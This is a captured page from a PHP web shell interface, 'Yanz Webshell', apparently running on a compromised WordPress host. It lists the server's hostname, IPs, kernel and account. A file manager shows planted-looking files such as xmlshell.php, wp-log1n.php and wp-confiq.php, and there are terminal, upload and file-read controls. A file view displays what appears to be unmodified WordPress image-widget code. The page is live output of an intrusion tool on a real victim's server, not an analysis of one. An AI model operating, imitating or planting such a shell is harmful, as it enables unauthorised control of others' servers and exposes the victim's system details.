Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-18 04:44:10
2792.60 GB Free: 1877.63 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.129
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2025-11-28 13:13:32dr-xr-xr-xRename Touch
[ .. ]dir2025-12-16 19:14:39drwx--x--xRename Touch
[ .tmb ]dir2025-11-12 07:07:40drwxrwxrwxRename Touch
[ .well-known ]dir2025-11-12 07:07:35drwxr-xr-xRename Touch
[ 117cb ]dir2025-11-14 05:53:05dr-xr-xr-xRename Touch
[ 1d8b10 ]dir2025-11-14 08:28:52drwxr-xr-xRename Touch
[ cgi-bin ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ f4727b ]dir2025-11-19 07:48:55drwxr-xr-xRename Touch
[ images ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ wp-admin ]dir2025-11-26 03:07:13drwxr-xr-xRename Touch
[ wp-content ]dir2025-11-22 08:16:38drwxr-xr-xRename Touch
[ wp-includes ]dir2025-11-22 08:16:25drwxr-xr-xRename Touch
.htaccess1.13 KB2025-11-28 13:17:43-r-xr-xr-xRename Touch Edit Download
.htaccess.phpupgrader.574027731.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.9e97ffcf1.45 KB2023-08-02 18:50:37-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.initial1.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
click.php1.93 KB2023-09-14 08:16:25-r--r--r--Rename Touch Edit Download
defaults.php1.93 KB2023-07-21 03:50:14-r--r--r--Rename Touch Edit Download
ex.php5.96 KB2025-11-28 13:13:32-rw-r--r--Rename Touch Edit Download
header.php0 B2025-11-10 06:52:51-rw-r--r--Rename Touch Edit Download
index.php35.97 KB2023-05-29 08:16:38-r-xr-xr-xRename Touch Edit Download
index.php035.97 KB2023-09-11 08:16:37-rwxr-xr-xRename Touch Edit Download
item.php1.29 KB2023-08-18 08:15:39-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
mah.php1.93 KB2023-12-31 03:48:47-r--r--r--Rename Touch Edit Download
networks.php1.29 KB2024-01-13 03:43:18-r--r--r--Rename Touch Edit Download
options.php1.93 KB2023-12-03 08:16:25-r--r--r--Rename Touch Edit Download
pages.php1.44 KB2023-07-28 08:15:18-r--r--r--Rename Touch Edit Download
php.ini40 B2025-11-18 19:54:41-rw-r--r--Rename Touch Edit Download
plugins.php1.87 KB2023-07-01 08:16:25-r--r--r--Rename Touch Edit Download
product.php2.03 KB2023-04-16 03:50:14-r--r--r--Rename Touch Edit Download
quoys.php26.20 KB2025-11-13 01:08:41-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2025-09-30 22:02:04-rw-r--r--Rename Touch Edit Download
robots.txt364 B2023-06-15 08:16:38-r--r--r--Rename Touch Edit Download
search.php1.46 KB2023-12-19 08:16:38-r--r--r--Rename Touch Edit Download
track.php6.49 KB2025-11-12 04:05:52-rw-r--r--Rename Touch Edit Download
txets.php5.89 KB2025-11-12 06:13:57-rw-r--r--Rename Touch Edit Download
wp-activate.php7.21 KB2024-04-02 19:31:34-rw-r--r--Rename Touch Edit Download
wp-blog-header.php347 B2025-11-10 06:52:59-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2023-08-09 07:36:19-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
wp-config.php3.12 KB2022-02-15 07:01:10-rw-------Rename Touch Edit Download
wp-confiq.php0 B2025-11-10 06:52:50-rw-r--r--Rename Touch Edit Download
wp-cron.php5.51 KB2025-11-10 06:53:00-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-log1n.php1.72 KB2024-01-28 08:14:59-r--r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-settings.php29.38 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.98 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
xmlshell.php243.86 KB2025-11-13 16:26:34-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
User: kheruwym (1551)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/kheruwym/public_html/wp-includes/widgets/
Upload Files
File: /home/kheruwym/public_html/wp-includes/widgets/class-wp-widget-media-image.php
<?php
/**
 * Widget API: WP_Widget_Media_Image class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.8.0
 */

/**
 * Core class that implements an image widget.
 *
 * @since 4.8.0
 *
 * @see WP_Widget_Media
 * @see WP_Widget
 */
class WP_Widget_Media_Image extends WP_Widget_Media {

	/**
	 * Constructor.
	 *
	 * @since 4.8.0
	 */
	public function __construct() {
		parent::__construct(
			'media_image',
			__( 'Image' ),
			array(
				'description' => __( 'Displays an image.' ),
				'mime_type'   => 'image',
			)
		);

		$this->l10n = array_merge(
			$this->l10n,
			array(
				'no_media_selected'          => __( 'No image selected' ),
				'add_media'                  => _x( 'Add Image', 'label for button in the image widget' ),
				'replace_media'              => _x( 'Replace Image', 'label for button in the image widget; should preferably not be longer than ~13 characters long' ),
				'edit_media'                 => _x( 'Edit Image', 'label for button in the image widget; should preferably not be longer than ~13 characters long' ),
				'missing_attachment'         => sprintf(
					/* translators: %s: URL to media library. */
					__( 'That image cannot be found. Check your <a href="%s">media library</a> and make sure it was not deleted.' ),
					esc_url( admin_url( 'upload.php' ) )
				),
				/* translators: %d: Widget count. */
				'media_library_state_multi'  => _n_noop( 'Image Widget (%d)', 'Image Widget (%d)' ),
				'media_library_state_single' => __( 'Image Widget' ),
			)
		);
	}

	/**
	 * Get schema for properties of a widget instance (item).
	 *
	 * @since 4.8.0
	 *
	 * @see WP_REST_Controller::get_item_schema()
	 * @see WP_REST_Controller::get_additional_fields()
	 * @link https://core.trac.wordpress.org/ticket/35574
	 *
	 * @return array Schema for properties.
	 */
	public function get_instance_schema() {
		return array_merge(
			array(
				'size'              => array(
					'type'        => 'string',
					'enum'        => array_merge( get_intermediate_image_sizes(), array( 'full', 'custom' ) ),
					'default'     => 'medium',
					'description' => __( 'Size' ),
				),
				'width'             => array( // Via 'customWidth', only when size=custom; otherwise via 'width'.
					'type'        => 'integer',
					'minimum'     => 0,
					'default'     => 0,
					'description' => __( 'Width' ),
				),
				'height'            => array( // Via 'customHeight', only when size=custom; otherwise via 'height'.
					'type'        => 'integer',
					'minimum'     => 0,
					'default'     => 0,
					'description' => __( 'Height' ),
				),

				'caption'           => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => 'wp_kses_post',
					'description'           => __( 'Caption' ),
					'should_preview_update' => false,
				),
				'alt'               => array(
					'type'              => 'string',
					'default'           => '',
					'sanitize_callback' => 'sanitize_text_field',
					'description'       => __( 'Alternative Text' ),
				),
				'link_type'         => array(
					'type'                  => 'string',
					'enum'                  => array( 'none', 'file', 'post', 'custom' ),
					'default'               => 'custom',
					'media_prop'            => 'link',
					'description'           => __( 'Link To' ),
					'should_preview_update' => true,
				),
				'link_url'          => array(
					'type'                  => 'string',
					'default'               => '',
					'format'                => 'uri',
					'media_prop'            => 'linkUrl',
					'description'           => __( 'URL' ),
					'should_preview_update' => true,
				),
				'image_classes'     => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => array( $this, 'sanitize_token_list' ),
					'media_prop'            => 'extraClasses',
					'description'           => __( 'Image CSS Class' ),
					'should_preview_update' => false,
				),
				'link_classes'      => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => array( $this, 'sanitize_token_list' ),
					'media_prop'            => 'linkClassName',
					'should_preview_update' => false,
					'description'           => __( 'Link CSS Class' ),
				),
				'link_rel'          => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => array( $this, 'sanitize_token_list' ),
					'media_prop'            => 'linkRel',
					'description'           => __( 'Link Rel' ),
					'should_preview_update' => false,
				),
				'link_target_blank' => array(
					'type'                  => 'boolean',
					'default'               => false,
					'media_prop'            => 'linkTargetBlank',
					'description'           => __( 'Open link in a new tab' ),
					'should_preview_update' => false,
				),
				'image_title'       => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => 'sanitize_text_field',
					'media_prop'            => 'title',
					'description'           => __( 'Image Title Attribute' ),
					'should_preview_update' => false,
				),

				/*
				 * There are two additional properties exposed by the PostImage modal
				 * that don't seem to be relevant, as they may only be derived read-only
				 * values:
				 * - originalUrl
				 * - aspectRatio
				 * - height (redundant when size is not custom)
				 * - width (redundant when size is not custom)
				 */
			),
			parent::get_instance_schema()
		);
	}

	/**
	 * Render the media on the frontend.
	 *
	 * @since 4.8.0
	 *
	 * @param array $instance Widget instance props.
	 */
	public function render_media( $instance ) {
		$instance = array_merge( wp_list_pluck( $this->get_instance_schema(), 'default' ), $instance );
		$instance = wp_parse_args(
			$instance,
			array(
				'size' => 'thumbnail',
			)
		);

		$attachment = null;

		if ( $this->is_attachment_with_mime_type( $instance['attachment_id'], $this->widget_options['mime_type'] ) ) {
			$attachment = get_post( $instance['attachment_id'] );
		}

		if ( $attachment ) {
			$caption = '';
			if ( ! isset( $instance['caption'] ) ) {
				$caption = $attachment->post_excerpt;
			} elseif ( trim( $instance['caption'] ) ) {
				$caption = $instance['caption'];
			}

			$image_attributes = array(
				'class' => sprintf( 'image wp-image-%d %s', $attachment->ID, $instance['image_classes'] ),
				'style' => 'max-width: 100%; height: auto;',
			);
			if ( ! empty( $instance['image_title'] ) ) {
				$image_attributes['title'] = $instance['image_title'];
			}

			if ( $instance['alt'] ) {
				$image_attributes['alt'] = $instance['alt'];
			}

			$size = $instance['size'];

			if ( 'custom' === $size || ! in_array( $size, array_merge( get_intermediate_image_sizes(), array( 'full' ) ), true ) ) {
				$size  = array( $instance['width'], $instance['height'] );
				$width = $instance['width'];
			} else {
				$caption_size = _wp_get_image_size_from_meta( $instance['size'], wp_get_attachment_metadata( $attachment->ID ) );
				$width        = empty( $caption_size[0] ) ? 0 : $caption_size[0];
			}

			$image_attributes['class'] .= sprintf( ' attachment-%1$s size-%1$s', is_array( $size ) ? implode( 'x', $size ) : $size );

			$image = wp_get_attachment_image( $attachment->ID, $size, false, $image_attributes );

		} else {
			if ( empty( $instance['url'] ) ) {
				return;
			}

			$instance['size'] = 'custom';
			$caption          = $instance['caption'];
			$width            = $instance['width'];
			$classes          = 'image ' . $instance['image_classes'];
			if ( 0 === $instance['width'] ) {
				$instance['width'] = '';
			}
			if ( 0 === $instance['height'] ) {
				$instance['height'] = '';
			}

			$attr = array(
				'class'  => $classes,
				'src'    => $instance['url'],
				'alt'    => $instance['alt'],
				'width'  => $instance['width'],
				'height' => $instance['height'],
			);

			$loading_optimization_attr = wp_get_loading_optimization_attributes(
				'img',
				$attr,
				'widget_media_image'
			);

			$attr = array_merge( $attr, $loading_optimization_attr );

			$attr  = array_map( 'esc_attr', $attr );
			$image = '<img';

			foreach ( $attr as $name => $value ) {
				$image .= ' ' . $name . '="' . $value . '"';
			}

			$image .= ' />';
		} // End if().

		$url = '';
		if ( 'file' === $instance['link_type'] ) {
			$url = $attachment ? wp_get_attachment_url( $attachment->ID ) : $instance['url'];
		} elseif ( $attachment && 'post' === $instance['link_type'] ) {
			$url = get_attachment_link( $attachment->ID );
		} elseif ( 'custom' === $instance['link_type'] && ! empty( $instance['link_url'] ) ) {
			$url = $instance['link_url'];
		}

		if ( $url ) {
			$link = sprintf( '<a href="%s"', esc_url( $url ) );
			if ( ! empty( $instance['link_classes'] ) ) {
				$link .= sprintf( ' class="%s"', esc_attr( $instance['link_classes'] ) );
			}
			if ( ! empty( $instance['link_rel'] ) ) {
				$link .= sprintf( ' rel="%s"', esc_attr( $instance['link_rel'] ) );
			}
			if ( ! empty( $instance['link_target_blank'] ) ) {
				$link .= ' target="_blank"';
			}
			$link .= '>';
			$link .= $image;
			$link .= '</a>';
			$image = $link;
		}

		if ( $caption ) {
			$image = img_caption_shortcode(
				array(
					'width'   => $width,
					'caption' => $caption,
				),
				$image
			);
		}

		echo $image;
	}

	/**
	 * Loads the required media files for the media manager and scripts for media widgets.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_admin_scripts() {
		parent::enqueue_admin_scripts();

		$handle = 'media-image-widget';
		wp_enqueue_script( $handle );

		$exported_schema = array();
		foreach ( $this->get_instance_schema() as $field => $field_schema ) {
			$exported_schema[ $field ] = wp_array_slice_assoc( $field_schema, array( 'type', 'default', 'enum', 'minimum', 'format', 'media_prop', 'should_preview_update' ) );
		}
		wp_add_inline_script(
			$handle,
			sprintf(
				'wp.mediaWidgets.modelConstructors[ %s ].prototype.schema = %s;',
				wp_json_encode( $this->id_base ),
				wp_json_encode( $exported_schema )
			)
		);

		wp_add_inline_script(
			$handle,
			sprintf(
				'
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.mime_type = %2$s;
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n = _.extend( {}, wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n, %3$s );
				',
				wp_json_encode( $this->id_base ),
				wp_json_encode( $this->widget_options['mime_type'] ),
				wp_json_encode( $this->l10n )
			)
		);
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.8.0
	 */
	public function render_control_template_scripts() {
		parent::render_control_template_scripts();

		?>
		<script type="text/html" id="tmpl-wp-media-widget-image-fields">
			<# var elementIdPrefix = 'el' + String( Math.random() ) + '_'; #>
			<# if ( data.url ) { #>
			<p class="media-widget-image-link">
				<label for="{{ elementIdPrefix }}linkUrl"><?php esc_html_e( 'Link to:' ); ?></label>
				<input id="{{ elementIdPrefix }}linkUrl" type="text" class="widefat link" value="{{ data.link_url }}" placeholder="https://" pattern="((\w+:)?\/\/\w.*|\w+:(?!\/\/$)|\/|\?|#).*">
			</p>
			<# } #>
		</script>
		<script type="text/html" id="tmpl-wp-media-widget-image-preview">
			<# if ( data.error && 'missing_attachment' === data.error ) { #>
				<?php
				wp_admin_notice(
					$this->l10n['missing_attachment'],
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt', 'notice-missing-attachment' ),
					)
				);
				?>
			<# } else if ( data.error ) { #>
				<?php
				wp_admin_notice(
					__( 'Unable to preview media due to an unknown error.' ),
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt' ),
					)
				);
				?>
			<# } else if ( data.url ) { #>
				<img class="attachment-thumb" src="{{ data.url }}" draggable="false" alt="{{ data.alt }}"
					<# if ( ! data.alt && data.currentFilename ) { #>
						aria-label="
						<?php
						echo esc_attr(
							sprintf(
								/* translators: %s: The image file name. */
								__( 'The current image has no alternative text. The file name is: %s' ),
								'{{ data.currentFilename }}'
							)
						);
						?>
						"
					<# } #>
				/>
			<# } #>
		</script>
		<?php
	}
}
@ Telegram